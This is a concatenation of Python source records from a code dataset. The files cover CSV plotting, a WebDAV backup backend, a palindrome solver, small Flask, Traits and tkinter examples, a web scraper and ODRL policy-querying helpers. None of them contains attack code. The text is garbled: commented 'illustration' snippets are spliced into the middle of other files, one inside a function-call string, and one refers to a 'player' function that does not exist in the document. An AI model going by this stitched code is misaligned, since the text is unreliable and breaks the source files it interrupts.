__init__(self, filename, n_columns=2):\n self.filename = filename\n self.n_columns = n_columns\n\n self.data = self.get_data()\n\n def get_data(self):\n data = [[] for i in range(self.n_columns)]\n\n with open(self.filename, \"r\") as csvfileQuick:\n file = csv_libary.reader(csvfileQuick, delimiter=\",\")\n next(file) # Skip first line / header\n for row in file:\n for i in range(self.n_columns):\n data[i].append(row[i])\n\n return data\n\n def extract_float_columns(self, colum_ids):\n data = [[] for i in range(len(colum_ids))]\n\n for i, ID in enumerate(colum_ids):\n for j in range(len(self.data[ID])):\n data[i].append(float(self.data[ID][j]))\n\n return data\n\n def plot_float_data(\n self,\n specific_columns,\n title=None,\n xlabel=\"x\",\n ylabel=\"y\",\n ylim=None,\n column_name=\"none\",\n style=\"r\",\n ):\n # dataset = self.extract_float_columns(range(len(self.data)))\n dataset = self.extract_float_columns(specific_columns)\n t = dataset[0]\n data = dataset[1:]\n\n for i, column in enumerate(data):\n plt.plot(t, column, style, label=column_name + str(i), markersize=1)\n\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n if title != None:\n plt.title(title)\n\n if ylim != None:\n plt.ylim(ylim)\n\n if column_name != \"none\":\n plt.legend()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n CSV = CSVprocessor(\"logs/data_plot_3.csv\", 3)\n # CSV.plot_float_data(title='GA Algorithm', 
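# Illustration: the ace handling in `player` above only demotes an ace from
# 11 to 1 for the initial two cards. A common whole-hand scoring sketch that
# demotes aces while the total busts; the function name is invented.
def hand_value(cards):
    total = sum(cards)
    aces = cards.count(11)
    while total > 21 and aces:
        total -= 10   # count one ace as 1 instead of 11
        aces -= 1
    return total

print(hand_value([11, 5, 11]))  # 17: one ace counted as 1
print(hand_value([11, 10]))     # 21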
xlabel='generation', ylabel='fitness', ylim=[0,100], style='r')\n CSV.plot_float_data(\n [0, 1],\n title=\"GA Algorithm\",\n xlabel=\"generation\",\n ylabel=\"win-rate\",\n ylim=[0, 100],\n style=\"r\",\n )\n # CSV.plot_float_data([0, 2], title='GA Algorithm', xlabel='generation', ylabel='average fitness', style='r')\n","repo_name":"PositiveBeat/GA-AI_ludopy","sub_path":"src/CSVprocessor.py","file_name":"CSVprocessor.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71435357289","text":"\nclass Person:\n\n def __init__(self, last_Name, first_Name, date_of_Birth, type_of_Person):\n self.lastName = last_Name\n self.firstName = first_Name\n self.dateOfBirth = date_of_Birth\n self.typeOfPerson = type_of_Person\n\n\n","repo_name":"DylanNicoliniHub/SER330-SP2023-Final","sub_path":"person_def.py","file_name":"person_def.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28295678234","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(description='Visualise twist data')\n parser.add_argument('inputs', nargs='*', help='Input npy files')\n args = parser.parse_args()\n\n twist_grids = [np.load(filename) for filename in args.inputs]\n\n n_columns = 1\n n_rows = int(len(twist_grids) / n_columns) + (len(twist_grids)%n_columns)\n\n # fig, axes = plt.subplots(n_rows, n_columns, sharex=True, sharey=True, figsize=(2*n_columns, 2*n_rows))\n # axes = axes.flatten()\n for filename,twist in zip(args.inputs, twist_grids):\n plt.imshow(twist.transpose())\n plt.tight_layout()\n plt.savefig(filename + \".png\")\n\n # plt.show()\n\nmain()\n","repo_name":"JamieJQuinn/field-line-integrator","sub_path":"visualise_twist.py","file_name":"visualise_twist.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34132835659","text":"import base64\nimport httplib\nimport re\nimport urllib\nimport urllib2\nimport xml.dom.minidom\n\nimport duplicity.backend\nfrom duplicity import globals\nfrom duplicity import log\nfrom duplicity.errors import * #@UnusedWildImport\nfrom duplicity import urlparse_2_5 as urlparser\n\nclass CustomMethodRequest(urllib2.Request):\n \"\"\"\n This request subclass allows explicit specification of\n the HTTP request method. 
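# Illustration of the column-wise CSV read used by CSVprocessor above, run on
# an in-memory file so the sketch needs no data on disk.
import csv
import io

text = "t,fitness\n0,1.5\n1,2.0\n"
reader = csv.reader(io.StringIO(text), delimiter=",")
next(reader)  # skip the header line, as the class does
columns = [[], []]
for row in reader:
    for i in range(2):
        columns[i].append(row[i])
print(columns)  # [['0', '1'], ['1.5', '2.0']] -- strings until cast to float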
Basic urllib2.Request class\n chooses GET or POST depending on self.has_data()\n \"\"\"\n def __init__(self, method, *args, **kwargs):\n self.method = method\n urllib2.Request.__init__(self, *args, **kwargs)\n\n def get_method(self):\n return self.method\n\n\nclass WebDAVBackend(duplicity.backend.Backend):\n \"\"\"Backend for accessing a WebDAV repository.\n\n webdav backend contributed in 2006 by Jesper Zedlitz \n \"\"\"\n listbody = \"\"\"\\\n\n\n\n\n\n\"\"\"\n\n \"\"\"Connect to remote store using WebDAV Protocol\"\"\"\n def __init__(self, parsed_url):\n duplicity.backend.Backend.__init__(self, parsed_url)\n self.headers = {'Connection': 'keep-alive'}\n self.parsed_url = parsed_url\n self.digest_challenge = None\n self.digest_auth_handler = None\n\n if parsed_url.path:\n foldpath = re.compile('/+')\n self.directory = foldpath.sub('/', parsed_url.path + '/' )\n else:\n self.directory = '/'\n\n log.Info(\"Using WebDAV host %s\" % (parsed_url.hostname,))\n log.Info(\"Using WebDAV port %s\" % (parsed_url.port,))\t\n log.Info(\"Using WebDAV directory %s\" % (self.directory,))\n log.Info(\"Using WebDAV protocol %s\" % (globals.webdav_proto,))\n\n if parsed_url.scheme == 'webdav':\n self.conn = httplib.HTTPConnection(parsed_url.hostname, parsed_url.port)\n elif parsed_url.scheme == 'webdavs':\n self.conn = httplib.HTTPSConnection(parsed_url.hostname, parsed_url.port)\n else:\n raise BackendException(\"Unknown URI scheme: %s\" % (parsed_url.scheme))\n\n def _getText(self,nodelist):\n rc = \"\"\n for node in nodelist:\n if node.nodeType == node.TEXT_NODE:\n rc = rc + node.data\n return rc\n\n def close(self):\n self.conn.close()\n\n def request(self, method, path, data=None):\n \"\"\"\n Wraps the connection.request method to retry once if authentication is\n required\n \"\"\"\n quoted_path = urllib.quote(path)\n\n if self.digest_challenge is not None:\n self.headers['Authorization'] = self.get_digest_authorization(path)\n self.conn.request(method, quoted_path, data, self.headers)\n response = self.conn.getresponse()\n if response.status == 401:\n response.close()\n self.headers['Authorization'] = self.get_authorization(response, quoted_path)\n self.conn.request(method, quoted_path, data, self.headers)\n response = self.conn.getresponse()\n\n return response\n\n def get_authorization(self, response, path):\n \"\"\"\n Fetches the auth header based on the requested method (basic or digest)\n \"\"\"\n try:\n auth_hdr = response.getheader('www-authenticate', '')\n token, challenge = auth_hdr.split(' ', 1)\n except ValueError:\n return None\n if token.lower() == 'basic':\n return self.get_basic_authorization()\n else:\n self.digest_challenge = self.parse_digest_challenge(challenge)\n return self.get_digest_authorization(path)\n\n def parse_digest_challenge(self, challenge_string):\n return urllib2.parse_keqv_list(urllib2.parse_http_list(challenge_string))\n\n def get_basic_authorization(self):\n \"\"\"\n Returns the basic auth header\n \"\"\"\n auth_string = '%s:%s' % (self.parsed_url.username, self.get_password())\n return 'Basic %s' % base64.encodestring(auth_string).strip()\n\n def get_digest_authorization(self, path):\n \"\"\"\n Returns the digest auth header\n \"\"\"\n u = self.parsed_url\n if self.digest_auth_handler is None:\n pw_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()\n pw_manager.add_password(None, self.conn.host, u.username, self.get_password())\n self.digest_auth_handler = urllib2.HTTPDigestAuthHandler(pw_manager)\n\n # building a dummy request that gets never sent,\n # needed 
for the call to auth_handler.get_authorization\n        scheme = u.scheme == 'webdavs' and 'https' or 'http'\n        hostname = u.port and \"%s:%s\" % (u.hostname, u.port) or u.hostname\n        dummy_url = \"%s://%s%s\" % (scheme, hostname, path)\n        dummy_req = CustomMethodRequest(self.conn._method, dummy_url)\n        auth_string = self.digest_auth_handler.get_authorization(dummy_req, self.digest_challenge)\n        return 'Digest %s' % auth_string\n\n    def list(self):\n        \"\"\"List files in directory\"\"\"\n        for n in range(1, globals.num_retries+1):\n            log.Info(\"Listing directory %s on WebDAV server\" % (self.directory,))\n            self.headers['Depth'] = \"1\"\n            response = self.request(\"PROPFIND\", self.directory, self.listbody)\n            del self.headers['Depth']\n            # if the target collection does not exist, create it.\n            if response.status == 404:\n                log.Info(\"Directory '%s' being created.\" % self.directory)\n                res = self.request(\"MKCOL\", self.directory)\n                log.Info(\"WebDAV MKCOL status: %s %s\" % (res.status, res.reason))\n                continue\n            if response.status == 207:\n                document = response.read()\n                break\n            log.Info(\"WebDAV PROPFIND attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n            if n == globals.num_retries +1:\n                log.Warn(\"WebDAV backend giving up after %d attempts to PROPFIND %s\" % (globals.num_retries, self.directory))\n                raise BackendException((response.status, response.reason))\n\n        log.Info(\"%s\" % (document,))\n        dom = xml.dom.minidom.parseString(document)\n        result = []\n        for href in dom.getElementsByTagName('d:href') + dom.getElementsByTagName('D:href'):\n            filename = self.__taste_href(href)\n            if filename:\n                result.append(filename)\n        return result\n\n    def __taste_href(self, href):\n        \"\"\"\n        Internal helper to taste the given href node and, if\n        it is a duplicity file, collect it as a result file.\n\n        @return: A matching filename, or None if the href did not match.\n        \"\"\"\n        raw_filename = self._getText(href.childNodes).strip()\n        parsed_url = urlparser.urlparse(urllib.unquote(raw_filename))\n        filename = parsed_url.path\n        log.Debug(\"webdav path decoding and translation: \"\n                  \"%s -> %s\" % (raw_filename, filename))\n\n        # at least one WebDAV server returns files in the form\n        # of full URLs. This may or may not be\n        # according to the standard, but regardless we\n        # feel we want to bail out if the hostname\n        # does not match until someone has looked into\n        # what the WebDAV protocol mandates.\n        if parsed_url.hostname is not None \\\n           and parsed_url.hostname != self.parsed_url.hostname:\n            m = \"Received filename was in the form of a \"\\\n                \"full url, but the hostname (%s) did \"\\\n                \"not match that of the webdav backend \"\\\n                \"url (%s) - aborting as a conservative \"\\\n                \"safety measure. 
If this happens to you, \"\\\n                \"please report the problem\"\\\n                \"\" % (parsed_url.hostname,\n                      self.parsed_url.hostname)\n            raise BackendException(m)\n\n        if filename.startswith(self.directory):\n            filename = filename.replace(self.directory,'',1)\n            return filename\n        else:\n            return None\n\n    def get(self, remote_filename, local_path):\n        \"\"\"Get remote filename, saving it to local_path\"\"\"\n        url = self.directory + remote_filename\n        target_file = local_path.open(\"wb\")\n        for n in range(1, globals.num_retries+1):\n            log.Info(\"Retrieving %s from WebDAV server\" % (url ,))\n            response = self.request(\"GET\", url)\n            if response.status == 200:\n                target_file.write(response.read())\n                assert not target_file.close()\n                local_path.setdata()\n                return\n            log.Info(\"WebDAV GET attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n        log.Warn(\"WebDAV backend giving up after %d attempts to GET %s\" % (globals.num_retries, url))\n        raise BackendException((response.status, response.reason))\n\n    def put(self, source_path, remote_filename = None):\n        \"\"\"Transfer source_path to remote_filename\"\"\"\n        if not remote_filename:\n            remote_filename = source_path.get_filename()\n        url = self.directory + remote_filename\n        source_file = source_path.open(\"rb\")\n        for n in range(1, globals.num_retries+1):\n            log.Info(\"Saving %s on WebDAV server\" % (url ,))\n            response = self.request(\"PUT\", url, source_file.read())\n            if response.status == 201:\n                response.read()\n                assert not source_file.close()\n                return\n            log.Info(\"WebDAV PUT attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n        log.Warn(\"WebDAV backend giving up after %d attempts to PUT %s\" % (globals.num_retries, url))\n        raise BackendException((response.status, response.reason))\n\n    def delete(self, filename_list):\n        \"\"\"Delete files in filename_list\"\"\"\n        for filename in filename_list:\n            url = self.directory + filename\n            for n in range(1, globals.num_retries+1):\n                log.Info(\"Deleting %s from WebDAV server\" % (url ,))\n                response = self.request(\"DELETE\", url)\n                if response.status == 204:\n                    response.read()\n                    break\n                log.Info(\"WebDAV DELETE attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n                if n == globals.num_retries +1:\n                    log.Warn(\"WebDAV backend giving up after %d attempts to DELETE %s\" % (globals.num_retries, url))\n                    raise BackendException((response.status, response.reason))\n\nduplicity.backend.register_backend(\"webdav\", WebDAVBackend)\nduplicity.backend.register_backend(\"webdavs\", WebDAVBackend)\n","repo_name":"hcarvalhoalves/duplicity","sub_path":"duplicity/backends/webdavbackend.py","file_name":"webdavbackend.py","file_ext":"py","file_size_in_byte":10736,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"53"} +{"seq_id":"23241014965","text":"# Given a string s, find the longest palindromic substring in s.\n\ns = \"babad\"\ns = \"cbbd\"\ns = \"aacabdkacaa\"\n# Dynamic programming: dp[i][j] records the palindromic length of s[i..j] (0 if not a palindrome).\ndef longestPalindrome(s):\n    dp = [[0] * len(s) for _ in range(len(s))]\n    maxL = 1\n    maxI = 0\n    maxJ = 0\n\n    for i in range(len(s)):\n        dp[i][i] = 1\n    for i in range(len(s) - 2, -1, -1):\n        for j in range(i + 1, len(s)):\n            if s[i] == s[j]:\n                if j == i + 1:\n                    dp[i][j] = 2\n                else:\n                    if dp[i + 1][j - 1] != 0:\n                        dp[i][j] = dp[i + 1][j - 1] + 2\n                if dp[i][j] > maxL:\n                    maxL = dp[i][j]\n                    maxI = i\n                    maxJ = j\n    print(dp)\n    return s[maxI:maxJ + 1]\n\nprint(longestPalindrome(s))","repo_name":"vandeppce/algorithm","sub_path":"10.dynamic 
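# Illustration: an O(1)-space alternative to the DP solution above, expanding
# around each of the 2n-1 possible palindrome centers; the function name is
# invented for the sketch.
def longest_palindrome_expand(s):
    best = ""
    for center in range(2 * len(s) - 1):
        lo, hi = center // 2, center // 2 + center % 2
        while lo >= 0 and hi < len(s) and s[lo] == s[hi]:
            lo, hi = lo - 1, hi + 1
        if hi - lo - 1 > len(best):
            best = s[lo + 1:hi]
    return best

print(longest_palindrome_expand("babad"))  # 'bab' ('aba' is equally valid)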
programming/5*LongestPalindrome.py","file_name":"5*LongestPalindrome.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21058225226","text":"import os\nfrom werkzeug.wsgi import DispatcherMiddleware\nfrom paste.cgiapp import CGIApplication\nfrom path import path\nfrom webob.dec import wsgify\n\n\nVIEWER_HOME = path(__file__).abspath().parent / 'maps'\n\n\ndef create_mapserver_app():\n mapserv_cgi = CGIApplication({}, os.environ.get('MAPSERV_BIN', 'mapserv'))\n\n @wsgify\n def mapserv_wrapper(request):\n request.GET['map'] = VIEWER_HOME / 'money.map'\n request.GET['SRS'] = 'EPSG:3857'\n return request.get_response(mapserv_cgi)\n\n return mapserv_wrapper\n\n\ndef initialize(app):\n app.wsgi_app = DispatcherMiddleware(app.wsgi_app, {\n '/mapserv': create_mapserver_app(),\n })\n","repo_name":"mgax/agripay","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23671102858","text":"from enthought.traits.api import HasTraits, Bool\nfrom enthought.traits.ui.api import View, Handler\n\n#--[Code]-----------------------------------------------------------------------\n\nclass TC_Handler(Handler):\n\n def setattr(self, info, object, name, value):\n Handler.setattr(self, info, object, name, value)\n info.object._updated = True\n\n def object__updated_changed(self, info):\n if info.initialized:\n info.ui.title += \"*\"\n\nclass TestClass(HasTraits):\n b1 = Bool\n b2 = Bool\n b3 = Bool\n _updated = Bool(False)\n\nview1 = View('b1', 'b2', 'b3', \n title=\"Alter Title\", \n handler=TC_Handler(),\n buttons = ['OK', 'Cancel'])\n\ntc = TestClass()\ntc.configure_traits(view=view1)\n\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/Traits/examples/tutorials/doc_examples/examples/handler_override.py","file_name":"handler_override.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"235349423","text":"# # person class\n\n# ----------------------------------------\n\n# class Person(object):\n# \tdef __init__(self, name, age):\n# \t\tself.name = name;\n# \t\tself.age = age;\n# \t\tself.known = [];\n\n\n# \tdef know(self, person):\n# \t\tself.known.append(person);\n\n# \tdef is_known(self, person):\n# \t\tprint('known' if bool(self.known.count(person)) else 'unknown');\t\n\n\n# person1 = Person('alex', 19);\n\n# person2 = Person('alice', 20);\n\n# person3 = Person('mike', 30);\n\n# person1.know(person2);\n\n# person1.is_known(person2);\n\n# person1.is_known(person3);\n\n# person1.know(person3);\n\n# person1.is_known(person3);\n# person2.is_known(person3);\n\n# ----------------------------------\n\n# printer class\n\n# ----------------------------------\n\n# class Printer(object):\n# \tdef __init__(self):\n# \t\tvalues_list = [];\n\n# \tdef log(self, *values):\n# \t\tvalues_list = [item for item in values];\n# \t\tprint(' '.join(values_list));\n\n\n# class FormatedPrinter(Printer):\n# \tdef form_log(self, *values):\n# \t\tprint('*********************');\n# \t\tself.log(*values);\t\t\t\n# \t\tprint('*********************');\n\n\n# form = FormatedPrinter();\n# form.form_log('2','3','4');\t\t\n\n# -----------------------------------------\n\n# animals and humans\n\n# -----------------------------------------\n\nclass Animal(object):\n\t\n\tdef __init__(self, 
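# Illustration of the DispatcherMiddleware mounting pattern used in viewer.py
# above, with two trivial WSGI callables standing in for the real apps.
from werkzeug.wsgi import DispatcherMiddleware  # werkzeug.middleware.dispatcher in newer releases

def main_app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'main']

def mapserv_app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'mounted under /mapserv']

application = DispatcherMiddleware(main_app, {'/mapserv': mapserv_app})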
aggression = False):\r\n\t\tself.aggression = aggression;\r\n\r\nclass Human(object):\r\n\r\n\tdef is_dangerous(self, animal):\r\n\t\tprint('dangerous' if animal.aggression else 'not dangerous');\t\t\r\n\r\n\r\ntiger = Animal(True);\r\nhorse = Animal(False);\r\n\r\njohn = Human();\r\n\r\njohn.is_dangerous(tiger);\r\njohn.is_dangerous(horse);","repo_name":"beLemoth/pythonTpl","sub_path":"les5.py","file_name":"les5.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27867919813","text":"#Module\r\n#Importing only the partial function\r\nfrom functools import partial\r\nfrom tkinter import *\r\n\r\n#Creating the window\r\naba = Tk()\r\n\r\n#Geometry\r\naba.geometry(\"300x200+100+100\")\r\n\r\n#Creating a generic callback definition\r\n#How it works: bt receives the button that triggered the call, and the label text receives the text of the button it is bound to\r\n#Definition\r\ndef botao(bt):\r\n    lb['text'] = bt['text']\r\n\r\n#If you try to use command to assign the result of the def, it will raise an error, because you would be invoking the function rather than linking it\r\n\r\n#Button\r\n#Rewriting a callback with partial\r\n#BT1\r\nbt1 = Button(aba, width=20, text='BT1')\r\n#Rewriting the value: the definition and then its argument (in this case the button and its TEXT value)\r\n#Correct\r\nbt1['command'] = partial(botao, bt1)\r\n#Wrong\r\n#bt1['command'] = botao(bt1): this invokes the function, which will raise an error if you try it\r\nbt1.place(x=50, y=50)\r\n\r\n#BT2\r\nbt2 = Button(aba, width=20, text='BT2')\r\n#Rewriting the value: the definition and then its argument (in this case the button and its TEXT value)\r\nbt2['command'] = partial(botao, bt2)\r\nbt2.place(x=50, y=80)\r\n\r\n#Label\r\nlb = Label(aba, text='Sem chamada')\r\nlb.place(x=50, y=110)\r\n \r\n#Running the window\r\naba.mainloop()\r\n","repo_name":"guilhermeG23/AulasPythonGuanabara","sub_path":"Tkinter/IntroducaoDeEventos2.py","file_name":"IntroducaoDeEventos2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18602308960","text":"from flask import Flask\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n    html_string = \"

Hello, World

\"\n html_string1 = \"

My name is Maheen

\"\n return html_string + html_string1\n\n@app.route('/portfolio')\ndef portfolio ():\n my_projects = \"

My Projects

\"\n list_of_projects = \"
  • My trip
  • Chicago Life
\"\n return my_projects + list_of_projects\n\n@app.route('/about/')\ndef about (person):\n about_me = \"

I am 21 years old and learning how to code

\"\n return about_me\napp.run(debug=True)","repo_name":"mhn-mnsr/DojoAssignments","sub_path":"Python/hello_flask/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23726317804","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\n\n\ndef get_title(url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n\n try:\n bs = BeautifulSoup(html.read(), \"html.parser\")\n tittle = bs.body.h1\n except AttributeError as e:\n return None\n\n return tittle\n\n\ntittle = get_title(\"https://www.pythonscraping.com/pages/page1.html\")\n\nif tittle is None:\n print(\"Tittle could be not be found.\")\nelse:\n print(tittle)\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"web_scraping_with_python_book/scraptest.py","file_name":"scraptest.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14635863570","text":"import logging\nimport pathlib\nimport posixpath\nimport pprint\nimport urllib.parse\nfrom collections import namedtuple\n\nimport colorama\nimport rdflib\nimport rdflib.plugins.sparql as sparql\nfrom rdflib import URIRef\n\nif __package__:\n from .namespaces import ODRL\n from .namespaces import MOSAICROWN\nelse:\n from mosaicrown.namespaces import ODRL\n from mosaicrown.namespaces import MOSAICROWN\n\n\ncolorama.init(autoreset=True)\n\n\ndef get_objects(graph, predicate, subject=None):\n \"\"\"Return a set of all the objects that match a predicate (and subject).\n\n :graph: The policy graph.\n :predicate: The predicate of the rules to match.\n :subject: The subject of the rules to match (defaults to any).\n :return: A set of all the objects that match the parameters in the graph.\n \"\"\"\n triples = graph.triples((subject, predicate, None))\n return set(obj for (subj, pred, obj) in triples)\n\n\ndef get_subjects(graph, predicate, object=None):\n \"\"\"Return a set of all the subjects that match a predicate (and object).\n\n :graph: The policy graph.\n :predicate: The predicate of the rules to match.\n :object: The object of the rules to match (defaults to any).\n :return: A set of all the subjects that match the parameters in the graph.\n \"\"\"\n triples = graph.triples((None, predicate, object))\n return set(subj for (subj, pred, obj) in triples)\n\n\ndef get_targets(graph):\n \"\"\"Return a set of all the odrl:target in the policy.\n\n :graph: The policy graph.\n :return: A set of all the odrl:target in the policy.\n \"\"\"\n return get_objects(graph, ODRL.target)\n\n\ndef get_assignee(graph):\n \"\"\"Return a set of all the odrl:assignee in the policy.\n\n :graph: The policy graph.\n :return: A set of all the odrl:assignee in the policy.\n \"\"\"\n return get_objects(graph, ODRL.assignee)\n\n\ndef generate_subpaths(iri):\n \"\"\"Generate all subpaths from an IRI string.\n\n :iri: An IRI string.\n :yield: A list of subpaths from the parent to the children.\n \"\"\"\n scheme, netloc, path, query, fragment = urllib.parse.urlsplit(iri)\n parent = urllib.parse.urlunsplit((scheme, netloc, \"/\", None, None))\n path = pathlib.PurePosixPath(path)\n\n # Iterate over the path parts (separated by \"/\").\n for part in path.parts:\n # Yields a path without the trailing \"/\".\n parent = urllib.parse.urljoin(parent, part)\n yield parent\n # Adds 
the trailing \"/\" for subsequent iterations.\n parent = urllib.parse.urljoin(parent, part + \"/\")\n\n\ndef add_iri_hierarchy_to_graph(graph, iri, predicate, reverse=False):\n \"\"\"Parse an IRI string and adds a dependency predicate to its parts.\n\n For instance, using the IRI \"http://example.com/A/B\" the following\n triples are added to the graph:\n\n (\"http://example.com/\", predicate, \"http://example.com/A\" )\n (\"http://example.com/A\", predicate, \"http://example.com/A/B\")\n\n :graph: The policy graph.\n :iri: An IRI string.\n :predicate: The predicate that will be used to generate the triples.\n :reverse: If reverse is True, the triples subject and object are swapped.\n \"\"\"\n paths = [rdflib.URIRef(path) for path in generate_subpaths(iri)]\n for parent, child in zip(paths, paths[1:]):\n subj, obj = (child, parent) if reverse else (parent, child)\n logging.debug(f\"Adding ({subj}, {predicate}, {obj})\")\n graph.add((subj, predicate, obj))\n\n\ndef get_target_constraints(graph, target):\n \"\"\"Recover constraints of rules having the specified URI as target.\n\n :graph: The policy graph.\n :target: The IRI string of the target.\n :return: The list of constraints on the given target.\n \"\"\"\n operand_types = [URIRef(\"http://www.w3.org/ns/odrl/2/and\"), URIRef(\"http://www.w3.org/ns/odrl/2/or\")]\n operand_type = \", \".join((\"<{}>\".format(o_type) for o_type in operand_types))\n\n regex = f\"http://((.)+/)?{target}\"\n # SPARQL query to recover the constraints inside a rule\n # To not use the REGEX remove FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n query_string = f\"\"\"\n SELECT DISTINCT ?leftOperand ?operator ?rightOperand ?type ?operand ?logcon\n WHERE {{\n {{\n ?rule odrl:target ?target.\n FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n ?policy ?type ?rule.\n ?rule odrl:constraint ?con.\n ?con odrl:leftOperand ?leftOperand.\n ?con odrl:operator ?operator.\n ?con odrl:rightOperand ?rightOperand\n }} UNION\n {{\n ?rule odrl:target ?target.\n FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n ?policy ?type ?rule.\n ?rule odrl:constraint ?logcon.\n ?logcon ?operand ?con.\n ?con odrl:leftOperand ?leftOperand.\n ?con odrl:operator ?operator.\n ?con odrl:rightOperand ?rightOperand\n FILTER (?operand IN ({operand_type}))\n }}\n }}\n \"\"\"\n # Recover only the constraint of the rules having the correct target\n bindings = {\n \"target\": rdflib.URIRef(target)\n }\n # Setup namespaces of the policy\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n\n query = sparql.prepareQuery(query_string, initNs=namespaces)\n # To use bindings instead of REGEX graph.query(query, initBindings=bindings)\n return graph.query(query)\n\n\ndef get_all_policy_rules_by_type(graph, rule_types=None):\n\n if not rule_types or len(rule_types) == 0:\n return None\n\n types = \", \".join((\"<{}>\".format(type) for type in rule_types))\n\n # SPARQL query to recover all the rules inside the policy graph\n queryString = \"\"\"\n SELECT DISTINCT ?rule ?target ?assignee ?action ?purpose\n WHERE {{\n ?policy ?predicate ?rule.\n ?rule odrl:target ?target.\n ?rule odrl:assignee ?assignee.\n ?rule odrl:action ?action.\n ?rule mosaicrown:purpose ?purpose\n FILTER (?predicate IN ({type}))\n }}\n \"\"\".format(type=types)\n\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n query = sparql.prepareQuery(queryString, initNs=namespaces)\n result = graph.query(query)\n Rule = namedtuple('Rule', 'URI target assignee action purpose')\n ruleDict = {}\n\n for row in result:\n if row[0] in ruleDict:\n 
ruleDict[row[0]].append(Rule(*row))\n else:\n ruleDict[row[0]] = [Rule(*row)]\n ruleSet = set()\n for rows in ruleDict.values():\n targets = tuple(row.target for row in rows)\n ruleSet.add(Rule(rows[0].URI, targets, rows[0].assignee, rows[0].action, rows[0].purpose))\n\n return ruleSet\n\n\ndef get_rules(graph, targets, assignee, action, purpose, pred, ns=None,\n expand_graph=True):\n \"\"\"Get the rules that assign the predicate `pred` to the assignee over\n the dictionary of targets (a map between table IRIs and accessed columns).\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :pred: The predicate that defines the rules that we are interested in.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: A dictionary that maps table IRIs to the rules that involve the\n requested columns (as specified in the `targets` dictionary).\n \"\"\"\n\n if expand_graph:\n add_iri_hierarchy_to_graph(graph, assignee, ODRL.belongsTo, True)\n add_iri_hierarchy_to_graph(graph, purpose, ODRL.partOf, True)\n\n # TODO: move namespaces updates to the reasoners when available.\n # Generate the namespaces to be used in the query.\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n if ns:\n namespaces.update(ns)\n\n # Create the query.\n queryString = \"\"\"\n SELECT DISTINCT ?rule\n WHERE {\n ?policy ?predicate ?rule .\n ?rule odrl:assignee ?assigneeRec .\n ?assignee mosaicrown:belongsTo* ?assigneeRec .\n ?rule odrl:action ?actionRec .\n ?action odrl:includedIn* ?actionRec .\n ?rule odrl:target ?targetRec .\n ?target odrl:partOf* ?targetRec .\n ?rule mosaicrown:purpose ?purposeRec .\n ?purpose mosaicrown:declinationOf* ?purposeRec .\n }\n \"\"\"\n query = sparql.prepareQuery(queryString, initNs=namespaces)\n\n # Prepare the result dictionary.\n rules = {}\n\n # Iterate over the tables and find a rule that has predicate on the\n # columns.\n for table_IRI in targets:\n column_rules = {}\n\n for column_name in targets[table_IRI]:\n column_IRI = rdflib.URIRef(posixpath.join(table_IRI, column_name))\n\n if expand_graph:\n add_iri_hierarchy_to_graph(graph, column_IRI,\n ODRL.partOf, True)\n\n bindings = {\n \"predicate\": pred,\n \"action\": action,\n \"target\": column_IRI,\n \"assignee\": assignee,\n \"purpose\": purpose\n }\n\n # Extract the rule uids that has predicate on the column.\n result = graph.query(query, initBindings=bindings)\n\n column_rules[column_IRI] = set(row[0] for row in result)\n\n # Add the column rules to the dictionary of table rules.\n rules[table_IRI] = column_rules\n\n return rules\n\n\ndef check_permission(graph, targets, assignee, action, purpose, 